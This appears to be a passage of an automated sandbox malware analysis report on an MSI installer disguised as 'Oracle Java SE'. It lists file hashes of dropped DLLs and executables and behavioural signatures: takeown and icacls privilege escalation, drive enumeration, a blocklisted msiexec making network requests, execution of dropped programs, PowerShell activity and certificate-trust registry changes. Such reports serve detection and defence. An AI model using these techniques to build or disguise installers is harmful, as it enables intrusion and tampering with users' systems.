| SHA1 | 2c302d1c535d5c40f31c3a75393118b40e1b2af9 |
| SHA256 | 1ee8e99190cc31b104fb75e66928b8c73138902fefedbcfb54c409df50a364df |
| SHA512 | 99144c67c33e89b8283c5b39b8bf68d55638daa6acc2715a2ac8c5dba4170dd12299d3a2dffb39ae38ef0872c2c68a64d7cdc6ceba5e660a53942761cb9eca83 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll
| MD5 | c9a55de62e53d747c5a7fddedef874f9 |
| SHA1 | c5c5a7a873a4d686bfe8e3da6dc70f724ce41bad |
| SHA256 | b5c725bbb475b5c06cc6cb2a2c3c70008f229659f88fba25ccd5d5c698d06a4b |
| SHA512 | adca0360a1297e80a8d3c2e07f5fbc06d2848f572f551342ad4c9884e4ab4bd1d3b3d9919b4f2b929e2848c1a88a4e844dd38c86067cace9685f9640db100efb |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll
| MD5 | 3f224766fe9b090333fdb43d5a22f9ea |
| SHA1 | 548d1bb707ae7a3dfccc0c2d99908561a305f57b |
| SHA256 | ae5e73416eb64bc18249ace99f6847024eceea7ce9c343696c84196460f3a357 |
| SHA512 | c12ea6758071b332368d7ef0857479d2b43a4b27ceeab86cbb542bd6f1515f605ea526dfa3480717f8f452989c25d0ee92bf3335550b15ecec79e9b25e66a2ca |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll
| MD5 | 23bd405a6cfd1e38c74c5150eec28d0a |
| SHA1 | 1d3be98e7dfe565e297e837a7085731ecd368c7b |
| SHA256 | a7fa48de6c06666b80184afee7e544c258e0fb11399ab3fe47d4e74667779f41 |
| SHA512 | c52d487727a34fbb601b01031300a80eca7c4a08af87567da32cb5b60f7a41eb2cae06697cd11095322f2fc8307219111ee02b60045904b5c9b1f37e48a06a21 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll
| MD5 | 6e704280d632c2f8f2cadefcae25ad85 |
| SHA1 | 699c5a1c553d64d7ff3cf4fe57da72bb151caede |
| SHA256 | 758a2f9ef6908b51745db50d89610fe1de921d93b2dbea919bfdba813d5d8893 |
| SHA512 | ade85a6cd05128536996705fd60c73f04bab808dafb5d8a93c45b2ee6237b6b4ddb087f1a009a9d289c868c98e61be49259157f5161feccf9f572fd306b460e6 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll
| MD5 | 95c5b49af7f2c7d3cd0bc14b1e9efacb |
| SHA1 | c400205c81140e60dffa8811c1906ce87c58971e |
| SHA256 | ff9b51aff7fbec8d7fe5cc478b12492a59b38b068dc2b518324173bb3179a0e1 |
| SHA512 | f320937b90068877c46d30a15440dc9ace652c3319f5d75e0c8bb83f37e78be0efb7767b2bd713be6d38943c8db3d3d4c3da44849271605324e599e1242309c3 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll
| MD5 | 79ee4a2fcbe24e9a65106de834ccda4a |
| SHA1 | fd1ba674371af7116ea06ad42886185f98ba137b |
| SHA256 | 9f7bda59faafc8a455f98397a63a7f7d114efc4e8a41808c791256ebf33c7613 |
| SHA512 | 6ef7857d856a1d23333669184a231ad402dc62c8f457a6305fe53ed5e792176ca6f9e561375a707da0d7dd27e6ea95f8c4355c5dc217e847e807000b310aa05c |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 1776a2b85378b27825cf5e5a3a132d9a |
| SHA1 | 626f0e7f2f18f31ec304fe7a7af1a87cbbebb1df |
| SHA256 | 675b1b82dd485cc8c8a099272db9241d0d2a7f45424901f35231b79186ec47ee |
| SHA512 | 541a5dd997fc5fec31c17b4f95f03c3a52e106d6fb590cb46bdf5adad23ed4a895853768229f3fbb9049f614d9bae031e6c43cec43fb38c89f13163721bb8348 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll
| MD5 | ad99c2362f64cde7756b16f9a016a60f |
| SHA1 | 07c9a78ee658bfa81db61dab039cffc9145cc6cb |
| SHA256 | 73ab2161a7700835b2a15b7487045a695706cc18bcee283b114042570bb9c0aa |
| SHA512 | 9c72f239adda1de11b4ad7028f3c897c93859ef277658aeaa141f09b7ddfe788d657b9cb1e2648971ecd5d27b99166283110ccba437d461003dbb9f6885451f7 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | d5166ab3034f0e1aa679bfa1907e5844 |
| SHA1 | 851dd640cb34177c43b5f47b218a686c09fa6b4c |
| SHA256 | 7bcab4ca00fb1f85fea29dd3375f709317b984a6f3b9ba12b8cf1952f97beee5 |
| SHA512 | 8f2d7442191de22457c1b8402faad594af2fe0c38280aaafc876c797ca79f7f4b6860e557e37c3dbe084fe7262a85c358e3eeaf91e16855a91b7535cb0ac832e |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 9ddea3cc96e0fdd3443cc60d649931b3 |
| SHA1 | af3cb7036318a8427f20b8561079e279119dca0e |
| SHA256 | b7c3ebc36c84630a52d23d1c0e79d61012dfa44cdebdf039af31ec9e322845a5 |
| SHA512 | 1427193b31b64715f5712db9c431593bdc56ef512fe353147ddb7544c1c39ded4371cd72055d82818e965aff0441b7cbe0b811d828efb0ece28471716659e162 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\VCRUNTIME140_1.dll
| MD5 | 1e109b1d40efcfec81a5d43d318cbb26 |
| SHA1 | 03aae193dc36d70fb34257d1276666e988b4a222 |
| SHA256 | 0f04b4cb12543687d8416dfc307593a1dbc450939fd7980d124fed4144732d69 |
| SHA512 | 762bb0fa8528936c8cfbd05e8beb557b9d751f3850124b3dcec102e3cd55550408666ffb27fea5472420ea40d95453279769765eee8f94ed2afa3d721018e1c4 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | 034379bcea45eb99db8cdfeacbc5e281 |
| SHA1 | bbf93d82e7e306e827efeb9612e8eab2b760e2b7 |
| SHA256 | 8b543b1bb241f5b773eb76f652dad7b12e3e4a09230f2e804cd6b0622e8baf65 |
| SHA512 | 7ea6efb75b0c59d3120d5b13da139042726a06d105c924095ed252f39ac19e11e8a5c6bb1c45fa7519c0163716745d03fb9daaaca50139a115235ab2815cc256 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll
| MD5 | 228c6bbe1bce84315e4927392a3baee5 |
| SHA1 | ba274aa567ad1ec663a2f9284af2e3cb232698fb |
| SHA256 | ac0cec8644340125507dd0bc9a90b1853a2d194eb60a049237fb5e752d349065 |
| SHA512 | 37a60cce69e81f68ef62c58bba8f2843e99e8ba1b87df9a5b561d358309e672ae5e3434a10a3dde01ae624d1638da226d42c64316f72f3d63b08015b43c56cab |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 9b79fda359a269c63dcac69b2c81caa4 |
| SHA1 | a38c81b7a2ec158dfcfeb72cb7c04b3eb3ccc0fb |
| SHA256 | 4d0f0ea6e8478132892f9e674e27e2bc346622fc8989c704e5b2299a18c1d138 |
| SHA512 | e69d275c5ec5eae5c95b0596f0cc681b7d287b3e2f9c78a9b5e658949e6244f754f96ad7d40214d22ed28d64e4e8bd507363cdf99999fea93cfe319078c1f541 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll
| MD5 | 39325e5f023eb564c87d30f7e06dff23 |
| SHA1 | 03dd79a7fbe3de1a29359b94ba2d554776bdd3fe |
| SHA256 | 56d8b7ee7619579a3c648eb130c9354ba1ba5b33a07a4f350370ee7b3653749a |
| SHA512 | 087b9dcb744ad7d330bacb9bda9c1a1df28ebb9327de0c5dc618e79929fd33d1b1ff0e1ef4c08f8b3ea8118b968a89f44fe651c66cba4ecbb3216cd4bcce3085 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8da414c3524a869e5679c0678d1640c1 |
| SHA1 | 60cf28792c68e9894878c31b323e68feb4676865 |
| SHA256 | 39723e61c98703034b264b97ee0fe12e696c6560483d799020f9847d8a952672 |
| SHA512 | 6ef3f81206e7d4dca5b3c1fafc9aa2328b717e61ee0acce30dfb15ad0fe3cb59b2bd61f92bf6046c0aae01445896dcb1485ad8be86629d22c3301a1b5f4f2cfa |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll
| MD5 | 70e9104e743069b573ca12a3cd87ec33 |
| SHA1 | 4290755b6a49212b2e969200e7a088d1713b84a2 |
| SHA256 | 7e6b33a4c0c84f18f2be294ec63212245af4fd8354636804ffe5ee9a0d526d95 |
| SHA512 | e979f28451d271f405b780fc2025707c8a29dcb4c28980ca42e33d4033666de0e4a4644defec6c1d5d4bdd3c73d405fafcffe3320c60134681f62805c965bfd9 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll
| MD5 | b3c188281aa3998f49391da0c3b52b8e |
| SHA1 | 67e6f1eb07861dddde3df9d266f683cb0331d433 |
| SHA256 | 59481427f4dad6460ac60c7619f628d6b7fad33562bbd8dc9145715ebb300e46 |
| SHA512 | 42d7a71d4ce1e0c6ea50ddbf960b6f0d25b32526604295f50688bf4770db7338d4b32f0dda738ae147def66788497537f708becdeb720e299c614c28fe824665 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll
| MD5 | 888aa12cc20f645dd2fc04f52e453bc6 |
| SHA1 | b19e790c9e6ceface9cdd41a24518d6e4a953b23 |
| SHA256 | 93e2aa20251e1a0485828c3e29b60e17ff2f3ec1285455d059ffe1b1a24518eb |
| SHA512 | f7d7a67244ff4f9a269461b49cdcd44d923840154447ca7ace61ef8167b79605c2f3c29a1d607b44831e68a696ef219710c4f1658a6fa73e564b7f252b031dc3 |
C:\Config.Msi\f778883.rbs
| MD5 | bc12acb03a9d902902e730ae9e7501a7 |
| SHA1 | 4ad27465d54492a1c1beccddcb98bff93a279330 |
| SHA256 | 338958c726a19c0176a5e6b0bfd6eb4ef55e368e73966889591e31f029355e1c |
| SHA512 | 33a68874d7a8c0165ba0eb8a04fb3b418e9af050964e44b513f1db4c134a686aca29aa6e8f84b6d638128be927f8d0e788ad94e8e1b96cccb11e8d5a1d8d2165 |
C:\Windows\Installer\f778881.msi
| MD5 | 1d2fdd9c09c8452e9c88222f2c16806a |
| SHA1 | 5852958feca13943a937f638a0ea6cfb59307574 |
| SHA256 | 7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5 |
| SHA512 | 4af7abc59c5dcfa065b858b1cb6a5a89f2e79d777acbcc5c7fc57175e20973bad0712f4d9adcb5eeec7bd8c44c90e255f4e22ba9035f2a82d1e8cc45aea87fb1 |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
| MD5 | 96b62cfb83cf0e9790a3ef939173ee31 |
| SHA1 | 23ecaefa21524e9446ea16e1f532f8bf9c5a56f1 |
| SHA256 | 6fe23163ea43ab8d9e84fed45b8590fe643d599c7f218ea05d505e3aeea86f23 |
| SHA512 | d018997c50702fe035bd3974180f274ffa34605bd19a3ce8fbabf96633794afe8f1ee4a2ee731a9ff3c73163e45ad26f8d7bac30b9ae55d1d47c8a333b657b6b |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll
| MD5 | 2e68a858f54dda699080af452da69e39 |
| SHA1 | 32a47540728cca729da3972f180c5c70042f0aca |
| SHA256 | 8c9889fad72842cd414738b8ef1915563d29e85e6defc1b147ea8864015a1d7b |
| SHA512 | 7754cbc50dd27553ca61206cb4cbe3ca36d3299ba31ce342ac293507cd445f68acec918602b35fb727132b9dd348c97575e21742c781a04cdceb22fea467851d |
C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll
| MD5 | e7fcab954f116c8bb4b006145c20dd23 |
| SHA1 | 91ee70a33ab12618f0f0ec229de4583d9aa52a8a |
| SHA256 | e52b21f458c61dab957fea7286544a0c6531a4caf5c97c323eea10a61a0b38b2 |
| SHA512 | d5cf56a35697b4afd88721f7c60156fd5b1ef7b659e8fe5e98db79f8fa41b394662bc4182b41af1a5a029ec3b04c909629db83d146683ca382958199f6ea73b9 |
memory/1248-220-0x000007FEF61F0000-0x000007FEF6670000-memory.dmp
memory/1248-222-0x000007FEF61F0000-0x000007FEF6670000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-07 11:25
Reported
2024-10-07 11:28
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\takeown.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA74E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57a2e7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B787FD59-D138-4CB1-8AF7-72A4E4815245} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA400.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA46F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIA897.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57a2e7.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\wix{B787FD59-D138-4CB1-8AF7-72A4E4815245}.SchedServiceConfig.rmi | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\e57a2e9.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico | C:\Windows\system32\msiexec.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
Loads dropped DLL
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\icacls.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\takeown.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
